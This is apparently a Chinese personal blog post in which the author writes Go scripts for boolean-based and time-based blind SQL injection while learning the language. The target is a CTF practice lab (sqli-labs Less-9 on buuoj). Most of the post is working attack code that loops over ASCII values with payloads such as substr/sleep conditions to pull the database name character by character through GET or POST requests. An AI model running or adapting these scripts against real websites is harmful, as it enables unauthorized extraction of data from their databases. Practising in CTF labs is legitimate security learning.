golang版布尔&时间盲注脚本
22 5.25 订正 : Sprintf里的i和j要用strconv.Itoa转换一下
当作练习go语言,突发奇想用golang写了个布尔盲注的脚本
package main import ( "fmt" "io/ioutil" "net/http" "net/url" "strings" ) func sqlinject(url1 string, method string) { var res string = "" //用来存放要读取的信息 for i := 1; i <= 60; i++ { for j := 32; j <= 128; j++ { var payloads string = fmt.Sprintf("?id=0' || (ascii(substr(database(),%d,1))=%d) -- q", i, j) //字符串拼接为payload body := make([]byte, 4096) //存放页面返回 if method == "get" { payloads = url.QueryEscape(payloads) //get传参要url编码 r, _ := http.Get(url1 + payloads) //发起GET请求 body, _ = ioutil.ReadAll(r.Body) //获取回复 } else if method == "post" { r, _ := http.Post(url1,"application/x-www-form-urlencoded",strings.NewReader(payloads)) // 发起post传参 body, _ = ioutil.ReadAll(r.Body) //获取回复 } if strings.Contains(string(body), "in...") { //手动输入判断标志 res += string(rune(j)) fmt.Println(res) } } } } func main() { url1 := "" //目标地址 method := "" //get||post sqlinject(url1, method) }
之后另择良辰吉日把时间盲注的也写出来😪
良辰吉日来了,补全了
package main import ( "fmt" "io/ioutil" "net/http" "net/url" "strings" "time" ) func Boolsql(url1 string, method string, payload string) { var res string = "" //用来存放要读取的信息 for i := 1; i <= 60; i++ { for j := 32; j <= 128; j++ { var payloads string = fmt.Sprintf(payload, i, j) //字符串拼接为payload body := make([]byte, 4096) //存放页面返回 if method == "get" { payloads = url.QueryEscape(payloads) //get传参要url编码 payloads = strings.Replace(payloads,"%3D","=",-1) //不能把=编码 r, _ := http.Get(url1 + "?" + payloads) //发起GET请求 body, _ = ioutil.ReadAll(r.Body) //获取回复 } else if method == "post" { value,_:=url.ParseQuery(payloads) r,_:=http.PostForm(url1,value) //post请求传参 body, _ = ioutil.ReadAll(r.Body) //获取回复 r.Body.Close() } time.Sleep(50*time.Millisecond) //防止429 if strings.Contains(string(body), "in..") { //手动输入判断标志 res += string(rune(j)) fmt.Println(res) break } } } } func Timesql(url1 string, method string, payload string ) { var res string = "" //用来存放要读取的信息 for i := 1; i <= 60; i++ { for j := 32; j <= 128; j++ { start:=time.Now() //请求前时间 var payloads string = fmt.Sprintf(payload, i, j) //字符串拼接为payload if method == "get" { payloads = url.QueryEscape(payloads) //get传参要url编码 payloads = strings.Replace(payloads,"%3D","=",-1) //不能把=编码 r, _ := http.Get(url1+"?"+payloads) //发起GET请求 r.Body.Close() } else if method == "post" { value,_:=url.ParseQuery(payloads) r, _ := http.PostForm(url1, value) // 发起post请求 r.Body.Close() } time.Sleep(50*time.Millisecond) //防止429 end:=time.Now() //结束时间 used:=end.Sub(start) //总用时
if used >= 3*time.Second{ res+=string(rune(j)) fmt.Println(res) break } } } } func main() { url1 := "http://25777b85-05b5-4f4e-83c9-b2d1ab3f267a.node4.buuoj.cn:81/Less-9/" //目标地址 method := "get" //get||post payload := "id=0' || if(ascii(substr(database(),%d,1))=%d,sleep(3),1) -- q" //形式:key1=value1&key2=value2 Timesql(url1, method, payload) }
编程能力有点垃🙄